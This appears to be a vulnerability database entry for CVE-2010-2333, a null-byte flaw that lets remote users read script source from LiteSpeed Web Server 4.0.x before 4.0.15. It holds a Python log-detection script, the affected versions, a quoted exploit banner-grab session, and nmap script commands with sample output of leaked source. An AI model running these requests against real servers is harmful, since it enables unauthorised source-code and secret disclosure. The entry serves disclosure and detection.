CVE-2010-2333

Published: 18/06/2010 Updated: 13/07/2010
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 535
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

LiteSpeed Technologies LiteSpeed Web Server 4.0.x prior to 4.0.15 allows remote malicious users to read the source code of scripts via an HTTP request with a null byte followed by a .txt file extension.
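
A log check for the request shape described in the summary, added here as an example and not part of the original entry: it scans access-log lines for a request path that contains a null byte followed by a .txt extension. The common/combined log format, the function name and the sample lines are assumptions.

```python
import re

# Assumed input: access log lines in common/combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# URL-encoded NUL, or the \x00 escape some servers write for a raw NUL byte.
NUL_RE = re.compile(r'%00|\\x00', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges), not taken from a real log.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Jun/2010:00:10:38 +0000] "GET /index.php HTTP/1.0" 200 5120',
    '198.51.100.7 - - [13/Jun/2010:00:11:02 +0000] "GET /phpinfo.php%00.txt HTTP/1.0" 200 64',
    '198.51.100.7 - - [13/Jun/2010:00:11:05 +0000] "GET /robots.txt HTTP/1.0" 200 24',
    '198.51.100.7 - - [13/Jun/2010:00:11:09 +0000] "GET /app/config.php\\x00.txt?x=1 HTTP/1.1" 404 0',
]


def find_nul_txt_requests(lines):
    """Return requests whose path has a NUL byte followed by a .txt suffix."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable request line
        # Drop query string and fragment; only the path matters here.
        path = re.split(r'[?#]', m.group("target"), maxsplit=1)[0]
        nul = NUL_RE.search(path)
        if nul is None or not path.lower().endswith(".txt"):
            continue
        hits.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "script": path[:nul.start()],  # path as it reads up to the NUL
            "status": int(m.group("status")),
        })
    return hits


if __name__ == "__main__":
    for hit in find_nul_txt_requests(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 against a server in the affected 4.0.x range is the one to review first, since the response body may have contained the script's source.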

Vulnerable Product

litespeedtech litespeed web server 4.0.9

litespeedtech litespeed web server 4.0.8

litespeedtech litespeed web server 4.0.1

litespeedtech litespeed web server 4.0

litespeedtech litespeed web server 4.0.14

litespeedtech litespeed web server 4.0.7

litespeedtech litespeed web server 4.0.6

litespeedtech litespeed web server 4.0.11

litespeedtech litespeed web server 4.0.10

litespeedtech litespeed web server 4.0.3

litespeedtech litespeed web server 4.0.2

litespeedtech litespeed web server 4.0.13

litespeedtech litespeed web server 4.0.12

litespeedtech litespeed web server 4.0.5

litespeedtech litespeed web server 4.0.4

Exploits

Litespeed Technologies Web Server Remote Poison null byte Zero-Day
discovered and exploited by Kingcope in June 2010
google gives me over 9million hits

Example exploit session:

%nc 192168219 80
HEAD / HTTP/1.0

HTTP/1.0 200 OK
Date: Sun, 13 Jun 2010 00:10:38 GMT
Server: LiteSpeed <-- consider it 0wned
Accept-Ranges: bytes
Connection: close
...

Nmap Scripts

http-litespeed-sourcecode-download

Exploits a null-byte poisoning vulnerability in Litespeed Web Servers 4.0.x before 4.0.15 to retrieve the target script's source code by sending an HTTP request with a null byte followed by a .txt file extension (CVE-2010-2333).

nmap -p80 --script http-litespeed-sourcecode-download --script-args http-litespeed-sourcecode-download.uri=/phpinfo.php <host>
nmap -p8088 --script http-litespeed-sourcecode-download <host>

PORT     STATE SERVICE    REASON
8088/tcp open  radan-http syn-ack
| http-litespeed-sourcecode-download.nse: /phpinfo.php source code:
| <HTML>
| <BODY>
| <?php phpinfo() ?>
| </BODY>
|_</HTML>